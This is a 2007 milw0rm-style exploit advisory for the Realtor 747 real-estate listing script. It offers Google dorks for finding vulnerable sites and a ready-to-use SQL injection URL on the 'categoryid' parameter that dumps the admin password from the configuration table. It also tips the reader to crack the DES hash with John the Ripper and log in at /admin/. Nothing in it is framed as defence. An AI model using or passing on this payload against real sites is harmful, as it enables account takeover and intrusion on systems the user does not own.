33 lines
No EOL
1.1 KiB
Text
33 lines
No EOL
1.1 KiB
Text
--==+================================================================================+==--
|
|
--==+ Realtor 747 SQL Injection Vulnerbility +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
AUTHOR: t0pP8uZz & xprog
|
|
SITE: http://www.it747.com/realtor747
|
|
DORK: inurl:"index.php?pageid=" Property Listings
|
|
DORK 2: inurl:"realtor747"
|
|
|
|
|
|
DESCRIPTION:
|
|
pullout admin password from database
|
|
|
|
|
|
EXPLOITS:
|
|
http://server.com/realtor747/index.php?pageid=2&categoryid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,config_value,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/FROM/**/AD747_CONFIG%20where/**/config_key=0x70617373776F7264/*
|
|
|
|
|
|
NOTE/TIP:
|
|
admin login is at /admin/
|
|
password is encrypted in DES, use JTR
|
|
|
|
|
|
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ Realtor 747 SQL Injection Vulnerbility +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2007-07-14] |